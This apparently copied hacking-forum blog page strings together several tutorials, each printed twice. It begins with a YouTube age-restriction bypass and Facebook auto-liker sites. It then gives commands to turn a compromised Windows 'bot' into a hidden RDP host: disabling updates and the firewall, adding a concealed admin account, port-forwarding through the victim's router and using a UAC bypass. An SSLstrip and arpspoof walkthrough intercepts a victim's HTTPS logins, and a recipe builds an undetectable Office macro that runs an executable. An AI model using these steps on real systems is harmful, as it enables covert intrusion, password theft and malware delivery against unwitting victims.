Wednesday, 8 February 2017
Bypass Youtube Age Security.
Youtube Age Restriction Bypass
Hey, I thought I would give this tutorial because although it has been out there for a long time, a lot of people I have found still don't seem to know how to do this
trick to get around Youtube's Video Restriction or Age Striction as some like to call it. Although this isn't really hacking, it's a cool technique and I think a worthy one to share!
Step 1: Find a restricted youtube video & look at the video URL like so:
![[Image: j8KEaNg.png]](https://i.imgur.com/j8KEaNg.png)
Step 2: Identify the "watch?" & "=" symbols in the URL surrounded by the letter 'V' as shown here:
![[Image: kpyeErc.png]](https://i.imgur.com/kpyeErc.png)
Step 3: Delete those sections highlighted in red & put a slash after the v, so the URL turns from this:
to this:
![[Image: VE5ksL5.png]](https://i.imgur.com/VE5ksL5.png)
Than once to go to that URL you just modified, you will have access to the full youtube video, except in fullscreen! It's a simple method to bypass age restriction
if you happen to not have an account, or if your account age is underage. I hope you like this simple tutorial!
Hey, I thought I would give this tutorial because although it has been out there for a long time, a lot of people I have found still don't seem to know how to do this
trick to get around Youtube's Video Restriction or Age Striction as some like to call it. Although this isn't really hacking, it's a cool technique and I think a worthy one to share!
Step 1: Find a restricted youtube video & look at the video URL like so:
Step 2: Identify the "watch?" & "=" symbols in the URL surrounded by the letter 'V' as shown here:
Step 3: Delete those sections highlighted in red & put a slash after the v, so the URL turns from this:
to this:
Than once to go to that URL you just modified, you will have access to the full youtube video, except in fullscreen! It's a simple method to bypass age restriction
if you happen to not have an account, or if your account age is underage. I hope you like this simple tutorial!
1000+ facebook likes
You Use an App via FB which will like other people's Comments,Pictures,Statuses who uses the Auto Likers.
What do you need :
Facebook account with : 18 + Age, everything have on PUBLIC so PPL can autolike your photos.
One of the good sites is : My liker . com
Site : My liker .com
Here's how to setup the FB settings & The Whole tutorial : http : // www . myliker . com /how-to.html
After you are done you will get to this page : http: // prntscr . com/csnff1
You choose : FB auto liker & get to this page : http : // prntscr . com/csnfwo
Then you just click Auto Like on the Photo you like the most or where you want the likes and it will be random PPL liking your Pictures.
After that you need to wait like 15minutes to use it more time.
Now to "bypass" this, what you do is search for another auto like sites !
Some Good sites : Myliker . com
http :// www.myfbliker.com/
http :/ /autoliker4fb.com/
AND SO ON.....
PS : You will have toons and toons of 10secounds of redirecting
Enjody & Git some HQ Likes
What do you need :
Facebook account with : 18 + Age, everything have on PUBLIC so PPL can autolike your photos.
One of the good sites is : My liker . com
Site : My liker .com
Here's how to setup the FB settings & The Whole tutorial : http : // www . myliker . com /how-to.html
After you are done you will get to this page : http: // prntscr . com/csnff1
You choose : FB auto liker & get to this page : http : // prntscr . com/csnfwo
Then you just click Auto Like on the Photo you like the most or where you want the likes and it will be random PPL liking your Pictures.
After that you need to wait like 15minutes to use it more time.
Now to "bypass" this, what you do is search for another auto like sites !
Some Good sites : Myliker . com
http :// www.myfbliker.com/
http :/ /autoliker4fb.com/
AND SO ON.....
PS : You will have toons and toons of 10secounds of redirecting
Enjody & Git some HQ Likes
Enable RDP on Client
Hello everyone,
I was also looking for this like you all, but now i found i. i'll share you everything to avoid to research about it. So you could code your own C++/C#... RDP activator.
To enable RDP on a client, you need admin rights, if you have this, just open remote shell and type these commands :
Once you did it, the RDP is enabled on your bot, but there is problem about multi-session. When you'll connect on the client with localhost IP or his public IP (if you have access to his rooter). You'll see this message :
![[Image: fa52ce6acc.png]](https://puu.sh/tHAli/fa52ce6acc.png)
To enable multi-session on remote desktop, there is 2 ways :
1 _________________________________________________
- You stop RDP service with this command shell : net stop termservice
Downloading the termsrv.dll in C:/Windows/System32/termsrv.dll on clients to patch it by changing the offsets yourself, then you replace, then you start RDP service : net start termservice.
Let me explain you.
If you want to enable Multi-session RDP on your own PC you have to download Universal Termsrv.dll Patch :
![[Image: 520945e125.png]](https://puu.sh/tHAMc/520945e125.png)
What does it do ? It will detect the version of your termsrv.dll then change offsets,
![[Image: 257bcd5286.png]](https://puu.sh/tHAVL/257bcd5286.png)
So if you want to do it manually, make sure you disabled RDP with (net stop termservice) to pick the termsrv.dll of your client, if you dont disable you couldnt replace it since its openned on services.
Patch it manually, replace, restart termservice, then enjoy.
Once you know it, you can code yourself something to detect termsrv.dll version and patch it by searching on the web, each offsets to replace for each different version.
2 _________________________________________________
- You use RDPWrapper https://github.com/stascorp/rdpwrap/releases. You just have to download RDPWrap-v1.6.1 release, you extract, then you upload the directory on client and execute the install.bat.
Once you did it, the multi-session is enabled on client, you just have to connect on it with localhost IP and reverse or Public IP from rooter.
You can also check RDPWrapper to code your own RDP activator to avoid all these steps by hand.
________________________________________________________
What does i mean when i say "Public IP from rooter" ?
Its simple,
You use shell command to do "IPconfig", to take the gateway IP its usually (192.168.0.1/192.168.0.254/192.168.1.1/10.0.0.1...), then you use reverse to connect to gateway IP to have access to the rooter.
If you have password of it, find it by anyway, its not that hard, you should have access to everything!
Just do a portforward to the local IP of the client on port 3389 enable this.
And now you can use public IP to connect on hidden RDP from everywhere.
Ok, now the last problem is about admin rights,
If you dont have admin rights on bot, you need a good UAC Bypass, just buy one, use a free one if the OS of your client isnt patched about this free UAC Bypass, once you have it you can :
- Code your RDP activator and start it on client with an UAC Bypass.
- Making a batch file of all these shell commands at the beginning of the thread, then start the batch file with UAC Bypass, then start the install.bat of RDPWrap with the UAC Bypass.
Hope i explained everything well.
Notify me if there is any misunderstanding. My english isnt that proficient.
Notify me also if im wrong about anything on the TuT.
Enjoy.
I was also looking for this like you all, but now i found i. i'll share you everything to avoid to research about it. So you could code your own C++/C#... RDP activator.
To enable RDP on a client, you need admin rights, if you have this, just open remote shell and type these commands :
Code:
sc config wuauserv start= disabled
net stop wuauserv
netsh firewall set opmode disable
pkgmgr /iu:”TelnetServer”
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
net user User1 password /add
net localgroup "Administrators" /add User1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v User1 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /fOnce you did it, the RDP is enabled on your bot, but there is problem about multi-session. When you'll connect on the client with localhost IP or his public IP (if you have access to his rooter). You'll see this message :
To enable multi-session on remote desktop, there is 2 ways :
1 _________________________________________________
- You stop RDP service with this command shell : net stop termservice
Downloading the termsrv.dll in C:/Windows/System32/termsrv.dll on clients to patch it by changing the offsets yourself, then you replace, then you start RDP service : net start termservice.
Let me explain you.
If you want to enable Multi-session RDP on your own PC you have to download Universal Termsrv.dll Patch :
What does it do ? It will detect the version of your termsrv.dll then change offsets,
So if you want to do it manually, make sure you disabled RDP with (net stop termservice) to pick the termsrv.dll of your client, if you dont disable you couldnt replace it since its openned on services.
Patch it manually, replace, restart termservice, then enjoy.
Once you know it, you can code yourself something to detect termsrv.dll version and patch it by searching on the web, each offsets to replace for each different version.
2 _________________________________________________
- You use RDPWrapper https://github.com/stascorp/rdpwrap/releases. You just have to download RDPWrap-v1.6.1 release, you extract, then you upload the directory on client and execute the install.bat.
Once you did it, the multi-session is enabled on client, you just have to connect on it with localhost IP and reverse or Public IP from rooter.
You can also check RDPWrapper to code your own RDP activator to avoid all these steps by hand.
________________________________________________________
What does i mean when i say "Public IP from rooter" ?
Its simple,
You use shell command to do "IPconfig", to take the gateway IP its usually (192.168.0.1/192.168.0.254/192.168.1.1/10.0.0.1...), then you use reverse to connect to gateway IP to have access to the rooter.
If you have password of it, find it by anyway, its not that hard, you should have access to everything!
Just do a portforward to the local IP of the client on port 3389 enable this.
And now you can use public IP to connect on hidden RDP from everywhere.
Ok, now the last problem is about admin rights,
If you dont have admin rights on bot, you need a good UAC Bypass, just buy one, use a free one if the OS of your client isnt patched about this free UAC Bypass, once you have it you can :
- Code your RDP activator and start it on client with an UAC Bypass.
- Making a batch file of all these shell commands at the beginning of the thread, then start the batch file with UAC Bypass, then start the install.bat of RDPWrap with the UAC Bypass.
Hope i explained everything well.
Notify me if there is any misunderstanding. My english isnt that proficient.
Notify me also if im wrong about anything on the TuT.
Enjoy.
Hey guys!
Sorry i have to split this into 2 parts sadly i cant post 30 images in one topic :(
This is a tutorial on how to use SSL Strip with arpspoof to perform a MitM attack to hijack a victims HTTPS connection allowing you steal passwords and vulnerable information. I hope it is useful to you and that you enjoy it.
Many websites thees days use ssl(HTTPS) it offers an encrypted connection between the client and the server. I will be showing you how to setup arpspoof and ssl strip and perform a MitM attack to break it open.
Before i show you on how to setup anything I'm going to go over how a MitM attack works. MitM stand for man-in-the-middle. this is an attack that allows an intruder to intercept data going between a server(does not have to be on the same network) and a client on a local network without either party realising that the data is also being routed to the attacker.
ssl is a protocol that encrypts the data going between the client and server stopping an attacker from listening in to vulnerable data.
To bypass this we use a program called ssl strip, it imposes it's self as the victim so it receives the unencrypted data then sends it back on to the victim without them knowing. you can find more info on ssl strip here.
Ok now i have all that out of the way i will get on with the tutorial.
first of you will need:
a Linux .iso (i am using ubuntu but you many use any distro you like)
virtual box; this is to emulate Linux inside of windows.
I will get you to download ssl strip and arpspoof later in the tutorial.
If you already have Linux or know how to set up a virtual machine you may skip part 1. If you are using a VM just make sure your adapter is set to bridged mode or ssl strip wont work properly.
Ok once you have downloaded virtual box and ubuntu, start by installing virtual box.
once it has finished installing if you haven't already open it up, you should be confronted with this screen.
(yours wont have backtrack)
Ok we are going to create a new virtual machine, so hit the new button.
Hit next and you should see this.
You are going to need to change the operating system to Linux and the version to ubuntu(or to what distro you are using) and give it a name; hit next.
Now chose how much memory you want the virtual machine to have(keep it low if you don't have much ram)
Hit next on the virtual hard disk screen(leave the settings).on the next screen make sure the virtual disk is set to VDI then hit next again.
On the next screen make sure it's set to Dynamically Allocated. On the last screen select the size you what the virtual hard drive to be, I'm leaving at the default 8gig as i need minimal space for this tutorial.
Hit next then create and then create again.
Your virtual hard disk has now been created :D
Now we need to install Linux onto the virtual hard disk, start it by double clicking the virtual machine on the right side.
In info window will pop up just ignore and hit ok.you should now be com fronted with the first run wizard, hit next.
Ok we now need to select the Linux .iso for installation. start by clicking the folder icon on the right.
Now browse you computer and find the Linux .iso you downloaded earlier and hit open.
Then hit next then start. after a few seconds Linux should startup click install and just follow the installation until it's done then hit restart.
Once you have installed and restarted the virtual machine shut it down again, we need to change some settings. Once it's shut down you should be back at the virtual box manager. Select the virtual machine and hit settings.
A new window will appear with all the settings for that virtual machine. now you want to select the network tab.
Sorry i have to split this into 2 parts sadly i cant post 30 images in one topic :(
This is a tutorial on how to use SSL Strip with arpspoof to perform a MitM attack to hijack a victims HTTPS connection allowing you steal passwords and vulnerable information. I hope it is useful to you and that you enjoy it.
Many websites thees days use ssl(HTTPS) it offers an encrypted connection between the client and the server. I will be showing you how to setup arpspoof and ssl strip and perform a MitM attack to break it open.
Before i show you on how to setup anything I'm going to go over how a MitM attack works. MitM stand for man-in-the-middle. this is an attack that allows an intruder to intercept data going between a server(does not have to be on the same network) and a client on a local network without either party realising that the data is also being routed to the attacker.
ssl is a protocol that encrypts the data going between the client and server stopping an attacker from listening in to vulnerable data.
To bypass this we use a program called ssl strip, it imposes it's self as the victim so it receives the unencrypted data then sends it back on to the victim without them knowing. you can find more info on ssl strip here.
Ok now i have all that out of the way i will get on with the tutorial.
first of you will need:
a Linux .iso (i am using ubuntu but you many use any distro you like)
virtual box; this is to emulate Linux inside of windows.
I will get you to download ssl strip and arpspoof later in the tutorial.
If you already have Linux or know how to set up a virtual machine you may skip part 1. If you are using a VM just make sure your adapter is set to bridged mode or ssl strip wont work properly.
Ok once you have downloaded virtual box and ubuntu, start by installing virtual box.
once it has finished installing if you haven't already open it up, you should be confronted with this screen.
(yours wont have backtrack)
Spoiler (Click to View)
Ok we are going to create a new virtual machine, so hit the new button.
Spoiler (Click to View)
Hit next and you should see this.
Spoiler (Click to View)
You are going to need to change the operating system to Linux and the version to ubuntu(or to what distro you are using) and give it a name; hit next.
Spoiler (Click to View)
Now chose how much memory you want the virtual machine to have(keep it low if you don't have much ram)
Spoiler (Click to View)
Spoiler (Click to View)
On the next screen make sure it's set to Dynamically Allocated. On the last screen select the size you what the virtual hard drive to be, I'm leaving at the default 8gig as i need minimal space for this tutorial.
Hit next then create and then create again.
Your virtual hard disk has now been created :D
Spoiler (Click to View)
Now we need to install Linux onto the virtual hard disk, start it by double clicking the virtual machine on the right side.
Spoiler (Click to View)
Spoiler (Click to View)
Ok we now need to select the Linux .iso for installation. start by clicking the folder icon on the right.
Spoiler (Click to View)
Now browse you computer and find the Linux .iso you downloaded earlier and hit open.
Spoiler (Click to View)
Then hit next then start. after a few seconds Linux should startup click install and just follow the installation until it's done then hit restart.
Spoiler (Click to View)
Once you have installed and restarted the virtual machine shut it down again, we need to change some settings. Once it's shut down you should be back at the virtual box manager. Select the virtual machine and hit settings.
Spoiler (Click to View)
A new window will appear with all the settings for that virtual machine. now you want to select the network tab.
Spoiler (Click to View)
Note: this attack will only work in your LAN not over the internet.
Under adapter 1 you are going to change the setting 'Attached to:' from NAT to Bridged Adapter and select the network interface that connects to the rest of your LAN.
Hit ok and restart the virtual machine.
once you have logged in open terminal.
Applications-> Accessories-> Terminal
Once open type this into the command line.
it will then ask for you password then if you want to continue.
this will now download and install arpspoof.
Now we need to download ssl strip.
in a terminal window type out this command.
we will come back to ssl strip later
We now need to extract the archive.
in a terminal window type this
We now need to wright a iptable rule to route all http requests coming in on port 80 to ssl strip which will be running on port 8080.
in a terminal window type this.
We now need to enable packet forwarding.
In a terminal window type this.
this allows you to edit system files.
now type
Now we are all set to start the attack :)
I would like to note that this for of attack will ONLY work on a local network and not over the internet.
first we need to find the networks gateway, use this command.
The gateway ip will be in the bottom row under the gateway column.
You will now need the victims ip, i am not going to go over how to acquire one in this tutorial(i will be using my laptop as a victim).
We can now start the MitM attack with this command.
It should start spiting out arp reply messages.
This fools the router to send you all the traffic going to the victim.
Now we need to start ssl strip make sure you do this in a new window.
now i have put in a few arguments into the command: -f -l -w
-f replaces the favicon with a lock (it wont put https though), -l specifies what port sslstrip is to listen on and -w tells it write everything to a specified file.
Now we want to see what sslstrip is writing into ssllog.log
open a new window and type this
The window should be blank since there is nothing currently in the file.
Im going to go over to my laptop and log into gmail and see if has worked.
If it has worked HTTPS in the URL bar should be replaced by HTTP. 95% of the time people will over look this.
I will also note that any https sessions than have existed before ssl strip was started will say encrypted.
Enter some random email and password and try sign in.
Now go back to your Linux machine and it should show up.
If all went well you should now have sniffed the email and password from gmail.
this will happen to any site with ssl. sslstrip may encounter an error on some sites but 99% of the time it will continue as normal.
Thank you for reading. if you need any help or have any problems feel free to post here, pm me or contact me on skype (skypename: iamtheobelisk)
Once again thank you and have a nice day HF.
This tutorial is for educational purposes only.
Under adapter 1 you are going to change the setting 'Attached to:' from NAT to Bridged Adapter and select the network interface that connects to the rest of your LAN.
Hit ok and restart the virtual machine.
once you have logged in open terminal.
Applications-> Accessories-> Terminal
Spoiler (Click to View)
Once open type this into the command line.
Code:
sudo apt-get install dsniffthis will now download and install arpspoof.
Spoiler (Click to View)
Now we need to download ssl strip.
in a terminal window type out this command.
Code:
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
Spoiler (Click to View)
we will come back to ssl strip later
We now need to extract the archive.
in a terminal window type this
Code:
tar zxvf sslstrip-0.9.tar.gz
Spoiler (Click to View)
We now need to wright a iptable rule to route all http requests coming in on port 80 to ssl strip which will be running on port 8080.
in a terminal window type this.
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoiler (Click to View)
We now need to enable packet forwarding.
In a terminal window type this.
Code:
sudo -inow type
Code:
echo "1" > /proc/sys/net/ipv4/ip_forward
Spoiler (Click to View)
Now we are all set to start the attack :)
I would like to note that this for of attack will ONLY work on a local network and not over the internet.
first we need to find the networks gateway, use this command.
Code:
route -n
Spoiler (Click to View)
You will now need the victims ip, i am not going to go over how to acquire one in this tutorial(i will be using my laptop as a victim).
We can now start the MitM attack with this command.
Code:
sudo arpspoof -i eth0 -t <victim's ip> <gateway>
Spoiler (Click to View)
It should start spiting out arp reply messages.
This fools the router to send you all the traffic going to the victim.
Now we need to start ssl strip make sure you do this in a new window.
Code:
sudo python sslstrip-0.9/sslstrip.py -f -l 8080 -w ssllog.log-f replaces the favicon with a lock (it wont put https though), -l specifies what port sslstrip is to listen on and -w tells it write everything to a specified file.
Spoiler (Click to View)
Now we want to see what sslstrip is writing into ssllog.log
open a new window and type this
Code:
sudo tail -F ssllog.log
Spoiler (Click to View)
The window should be blank since there is nothing currently in the file.
Im going to go over to my laptop and log into gmail and see if has worked.
If it has worked HTTPS in the URL bar should be replaced by HTTP. 95% of the time people will over look this.
I will also note that any https sessions than have existed before ssl strip was started will say encrypted.
Spoiler (Click to View)
Enter some random email and password and try sign in.
Spoiler (Click to View)
Now go back to your Linux machine and it should show up.
Spoiler (Click to View)
If all went well you should now have sniffed the email and password from gmail.
this will happen to any site with ssl. sslstrip may encounter an error on some sites but 99% of the time it will continue as normal.
Thank you for reading. if you need any help or have any problems feel free to post here, pm me or contact me on skype (skypename: iamtheobelisk)
Once again thank you and have a nice day HF.
This tutorial is for educational purposes only.
Free FUD office Word/Excel macro!
Hello!
I don't see anyone share this tool on hf then I will share this with you guys. This is method how to get FUD macro easly.
1. Go to github.com/khr0x40sh/MacroShop and download all files.
2. Unzip your archive and open cmd.
3. Go to files directory via cmd and write "python exeinvba.py --exe test.exe --out test.vb" (test.exe is your file executed when macro starts).
4. Open new generated test.vb via notepad and copy all this code.
5. You can use this macro in Word/Excel/Powerpoint and more. Open for example Word go to "View" and "Macros". Set random name to your macro and select "Macros in:" "Document1". Click create and find tab "ThisDocument" (in Excel "ThisWorkbook"). Paste all code from test.vb.
6. If you use this code in Excel you don't have to change code but in Word you must change "Private Sub Workbook_Open()" to "Private Sub Document_Open()".
7. Save as .doc or .docm.
8. You got your FUD macro
I don't see anyone share this tool on hf then I will share this with you guys. This is method how to get FUD macro easly.
1. Go to github.com/khr0x40sh/MacroShop and download all files.
2. Unzip your archive and open cmd.
3. Go to files directory via cmd and write "python exeinvba.py --exe test.exe --out test.vb" (test.exe is your file executed when macro starts).
4. Open new generated test.vb via notepad and copy all this code.
5. You can use this macro in Word/Excel/Powerpoint and more. Open for example Word go to "View" and "Macros". Set random name to your macro and select "Macros in:" "Document1". Click create and find tab "ThisDocument" (in Excel "ThisWorkbook"). Paste all code from test.vb.
6. If you use this code in Excel you don't have to change code but in Word you must change "Private Sub Workbook_Open()" to "Private Sub Document_Open()".
7. Save as .doc or .docm.
8. You got your FUD macro
Subscribe to:
Posts (Atom)